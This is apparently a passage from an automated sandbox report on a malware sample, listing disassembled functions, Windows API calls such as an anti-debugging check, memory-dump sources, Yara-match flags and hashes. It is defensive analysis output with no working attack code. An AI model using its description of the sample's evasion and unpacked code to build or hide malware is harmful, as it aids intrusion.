                                                                                  • API String ID: 2834031935-0
                                                                                  • Opcode ID: 2b4fd7bd63b1ca4c86b7cdb97710403681583749ada0fe7a45d93d6fdc0ff965
                                                                                  • Instruction ID: c275762dc3584603e4449795e293da263c651eeb99c2a8a82852c084b1b0f28d
                                                                                  • Opcode Fuzzy Hash: 2b4fd7bd63b1ca4c86b7cdb97710403681583749ada0fe7a45d93d6fdc0ff965
                                                                                  • Instruction Fuzzy Hash: CA61B271900617AFDB289F25CC82BBA77A8EF18314F20517BEE05C6681E73DD951CB98
                                                                                  Function 0042A3F3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4EB
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4F5
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A502
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                                                  • Instruction ID: 9c884317c51d85a4b2a5569c8d07c46b6125cba9f3fa022ce0985413e040e42f
                                                                                  • Opcode Fuzzy Hash: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                                                  • Instruction Fuzzy Hash: 6D31D474901228ABCB21DF24D8887DDBBB8BF08710F5041EAE81CA7251EB749F958F49
                                                                                  Function 0485A65A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0483DAFC), ref: 0485A752
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0483DAFC), ref: 0485A75C
                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0483DAFC), ref: 0485A769
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                  • Instruction ID: daa722f78131fd657de325dbae7289adf7ba349c7d46707ef8a15bbfcf29f1ce
                                                                                  • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                  • Instruction Fuzzy Hash: 0431E87490121CABCB21DF68DC8878DBBB4BF08710F5046EAE91CA7260E774AB858F45
                                                                                  Function 0042FE7F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA0
                                                                                  • TerminateProcess.KERNEL32(00000000,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA7
                                                                                  • ExitProcess.KERNEL32 ref: 0042FEB9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                  • Instruction ID: f37ed9c2097ef164d49cac6b9283d1ec131115afdbcb09f205e89e36e121774d
                                                                                  • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                  • Instruction Fuzzy Hash: BCE08C31100158AFCF126F50EE08A4A3B39FF46B56F810439F9068B236CB39EE42CB48
                                                                                  Function 048600E6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,048600BC,00000000,00457970,0000000C,04860213,00000000,00000002,00000000), ref: 04860107
                                                                                  • TerminateProcess.KERNEL32(00000000,?,048600BC,00000000,00457970,0000000C,04860213,00000000,00000002,00000000), ref: 0486010E
                                                                                  • ExitProcess.KERNEL32 ref: 04860120
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                  • Instruction ID: 9ef72956ee46ee56e848069c9048417eaff64f7cc5a056bc55c51f78926fcb17
                                                                                  • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                  • Instruction Fuzzy Hash: ABE0B635000548ABCF56AF54DD09A593B69EB46E4BB004964F9068B121CB75EA42CA98
                                                                                  Function 0483092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .$GetProcAddress.$l
                                                                                  • API String ID: 0-2784972518
                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                  • Instruction ID: 149739309f03dbe445466843987720ab448d54d98ca183f061306273fba2323f
                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                  • Instruction Fuzzy Hash: CD316BB6900609CFEB11CF99C880AADBBF5FF09329F14454AD941E7214D7B1FA45CBA4
                                                                                  Function 04865447 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0486049A,?,00000004), ref: 0486549A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2299586839-1785270423
                                                                                  • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                  • Instruction ID: d2eb4e537d3346b52ebff1ef51d7807b72d01ad71e9d3599f3a6c451da42d988
                                                                                  • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                  • Instruction Fuzzy Hash: 4AF02B31640318BFDB015F64DC01F6E7B21EF04B12F004655FD06A7290DAB1AD20A6CA
                                                                                  Function 0042EB00 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                                                  • Instruction ID: 4ac827831b60bfe85137482c2a27181e9cc595fbcc224352d04797812a560731
                                                                                  • Opcode Fuzzy Hash: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                                                  • Instruction Fuzzy Hash: 74024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AE819E7384D734AD41CB84
                                                                                  Function 0485ED67 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                                                  • Instruction ID: 46cf2d933ae105085c1bad312081aed8dc4720f7b9697c589affe66fb301016a
                                                                                  • Opcode Fuzzy Hash: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                                                  • Instruction Fuzzy Hash: 33021D71E002199FDF14CFA9C8806AEBBF1EF88314F15866ADA19E7354D731AA41CB90
                                                                                  Function 04832621 Relevance: 3.1, APIs: 2, Instructions: 129nativewindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 04832648
                                                                                  • PostQuitMessage.USER32(00000000), ref: 048327EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageNtdllPostProc_QuitWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4264772764-0
                                                                                  • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                  • Instruction ID: e44a12754bfa96a65a13ae5e352d39608750e185d6ef45e6b8a9b525ff67393a
                                                                                  • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                  • Instruction Fuzzy Hash: DB411D15A64384A8E730EFA5FC15B2137B0FF64762F10253BE528CB2B2E3A19580C34E
                                                                                  Function 00436CDF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CDA,?,?,00000008,?,?,0043F19B,00000000), ref: 00436F0C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 3997070919-0
                                                                                  • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                  • Instruction ID: 56894988d221dc275bbeb5d863802b50bab2a0c2ec5e1dae9116b4c396cbcd5f
                                                                                  • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                  • Instruction Fuzzy Hash: 58B15D3521060AAFD715CF28C48AB657BE0FF09364F26D659E899CF3A1C339D992CB44
                                                                                  Function 04866F46 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04866F41,?,?,00000008,?,?,0486F402,00000000), ref: 04867173
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 3997070919-0
                                                                                  • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                  • Instruction ID: ede78e9a8e876948e3d35e797deac44909a2021adc34b5d70d11d543eb783366
                                                                                  • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                  • Instruction Fuzzy Hash: 95B15D31610608DFD755CF28C48AB657BE0FF45368F258A59E89ACF2A1D335E991CF80
                                                                                  Function 0043B665 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B6B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2955987475-0
                                                                                  • Opcode ID: f248db6eca06ff892e51bce8bbfaaacfef81b0ccb26f5c1b1a4e2b53f037ebcf
                                                                                  • Instruction ID: b1e829de63a4cfdbbeb590434fbc272015d29a09e68feb3eb70f55beb1ad3412
                                                                                  • Opcode Fuzzy Hash: f248db6eca06ff892e51bce8bbfaaacfef81b0ccb26f5c1b1a4e2b53f037ebcf
                                                                                  • Instruction Fuzzy Hash: 5921B33291020A9BDB249E25CC42BBB73A8EF48314F10217BFE01DA241EB399D45CB99
                                                                                  Function 0486B8CC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 048621C0
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621CD
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0486B920
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2955987475-0
                                                                                  • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                  • Instruction ID: 377e20468171810f5445a302ce05b5620da56c826c424100b90bfac7192261a2
                                                                                  • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                  • Instruction Fuzzy Hash: DB21DA3165022A9BEF65AF68DC41BBA73ACEF00318F0006BAED06C6141FB75F940DB51
                                                                                  Function 0043B2ED Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,004307D5,?,0043BA42,00000000,?,?,?), ref: 0043B35F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  • Opcode ID: f5690584e9ad499021b42ce56d8f8de17484a935533950cab043c7ceb3897eb3
                                                                                  • Instruction ID: db3c9ccc80d1476fb6d66557201e2f3895761b13365cb69cd331a803ccf2be29
                                                                                  • Opcode Fuzzy Hash: f5690584e9ad499021b42ce56d8f8de17484a935533950cab043c7ceb3897eb3
                                                                                  • Instruction Fuzzy Hash: C911063B6007019FDB189F39C8917BAB791FF88318F15442EEA8687B40D375A902C784
                                                                                  Function 0486B554 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,04860A3C,?,0486BCA9,00000000,?,?,?), ref: 0486B5C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  • Opcode ID: cce71207e2b51a43ae620771f06a8e25d222029b64e0dc1c2990edcd69b9ccff
                                                                                  • Instruction ID: c294b3e6be38f692cbda1c7cef3fa55679159b1734f19e1f0125303c664607fb
                                                                                  • Opcode Fuzzy Hash: cce71207e2b51a43ae620771f06a8e25d222029b64e0dc1c2990edcd69b9ccff
                                                                                  • Instruction Fuzzy Hash: 6511023A2007015FDB18AF3888A56BABB92FB8031CB14492DDA47C7B40E371B902CB40
                                                                                  Function 0043B895 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B633,00000000,00000000,?), ref: 0043B8C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InfoLocale_free
                                                                                  • String ID:
                                                                                  • API String ID: 787680540-0
                                                                                  • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                  • Instruction ID: cee2b43c6a9fd0cc18a312a7fa4a4d5932635e218f943acbfed5d814f3d68c37
                                                                                  • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                  • Instruction Fuzzy Hash: 79F0F936A00215ABDB2C6A26DC067BB775CEF44754F15442AEE05A3240EB39BE4186D8
                                                                                  Function 0486BAFC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0486B89A,00000000,00000000,?), ref: 0486BB28
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InfoLocale_free
                                                                                  • String ID:
                                                                                  • API String ID: 787680540-0
                                                                                  • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                  • Instruction ID: fd855d55f779da830cb71ea485573d9f6da0771c3fa3be52f392a1f4ad9f2338
                                                                                  • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                  • Instruction Fuzzy Hash: 89F0F932A001256BDB645E648C45FBA775CEB4071CF040E69DC07E3184EA70FF01C6D4
                                                                                  Function 0043B388 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,004307D5,?,0043BA06,004307D5,?,?,?,?,?,004307D5,?,?), ref: 0043B3D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  • Opcode ID: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                                                  • Instruction ID: 8e36b55a9bc7705faaba13b87098130e4a65547030758f83ed228488c18c5ef1
                                                                                  • Opcode Fuzzy Hash: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                                                  • Instruction Fuzzy Hash: BCF0C2362003045FDB145F3A9C92B6A7B95EF88768F15852EFE468B650D7B59C02C684
                                                                                  Function 0486B5EF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,04860A3C,?,0486BC6D,04860A3C,?,?,?,?,?,04860A3C,?,?), ref: 0486B63B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  • Opcode ID: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                                                  • Instruction ID: b2824c852274be8f66d2a7b8f8ba3221e9ea91631cad403b90f08b1af57d4d67
                                                                                  • Opcode Fuzzy Hash: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                                                  • Instruction Fuzzy Hash: BDF022363007041FEB145F398C81A6A7B91EF8072CF154A2DEA06CB680E6B1B8028604
                                                                                  Function 00434DED Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0042E40D: EnterCriticalSection.KERNEL32(?,?,00431C9A,?,00457A38,00000008,00431D68,?,?,?), ref: 0042E41C
                                                                                  • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00434E25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1272433827-0
                                                                                  • Opcode ID: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                                                  • Instruction ID: 31781df083fb6f98b94d2300e169204e9eab98a1842135cb0ce39f8875023ccf
                                                                                  • Opcode Fuzzy Hash: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                                                  • Instruction Fuzzy Hash: 57F04F32A103009FD754EF69E906B8D77E0AB49726F10426AF910DB2E2CB7999848F49
                                                                                  Function 04865054 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0485E674: RtlEnterCriticalSection.NTDLL(043E0DD4), ref: 0485E683
                                                                                  • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 0486508C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1272433827-0
                                                                                  • Opcode ID: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
                                                                                  • Instruction ID: 7f0ab073676b98a90c422d37a405f1a266e40077c33459130502807d8fe70801
                                                                                  • Opcode Fuzzy Hash: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
